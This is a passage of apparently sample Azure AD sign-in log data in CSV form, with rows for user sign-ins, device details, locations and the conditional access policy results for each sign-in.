+1309,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,82eb5251-002e-4779-a45e-459c74292a1a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",99476ccd-67d1-454b-a7cf-079eca610c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,99476ccd-67d1-454b-a7cf-079eca610c00,SigninLogs,Sucess,36.6404686,-78.26995087
+1310,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:54.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,52c87a36-e704-4414-a543-96fd7d0ea47e,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:21,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.471', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a69f9f56-6ed2-42c6-ae54-393fa7983a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a69f9f56-6ed2-42c6-ae54-393fa7983a00,SigninLogs,Sucess,35.01296997,-80.93171692
+1311,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:18.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,52c87a36-e704-4414-a543-96fd7d0ea47e,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:21,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.471', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",71f7989f-c381-4219-af31-8e8d406e3800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,71f7989f-c381-4219-af31-8e8d406e3800,SigninLogs,Sucess,35.01296997,-80.93171692
+1312,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:54.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,52c87a36-e704-4414-a543-96fd7d0ea47e,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:21,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.471', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a69f9f56-6ed2-42c6-ae54-393fa7983a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a69f9f56-6ed2-42c6-ae54-393fa7983a00,SigninLogs,Sucess,35.01296997,-80.93171692
+1313,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:20.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6b13be09-0fe6-42bf-a1e9-b652ae050717,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:35,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Chrome 80.0.3987', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",0f43c969-3206-4d99-a7af-cfe11bb70f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],{'errorCode': 0},Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0f43c969-3206-4d99-a7af-cfe11bb70f00,SigninLogs,Sucess,29.4803009,-81.21395111
+1314,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:57.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3f7752c8-1391-44f5-b7ae-b418263eecdc,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",22fd8c7c-75eb-4549-80fa-1727ac530c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,22fd8c7c-75eb-4549-80fa-1727ac530c00,SigninLogs,Sucess,50.6406517,5.572050095
+1315,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:47.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",db9d2eaf-e3fe-45a9-85f6-9ccab5ea0a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,db9d2eaf-e3fe-45a9-85f6-9ccab5ea0a00,SigninLogs,Sucess,33.0175209,35.44601059
+1316,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:59.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9fddf9a9-3fc0-40d2-ad77-fb16bfccc608,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 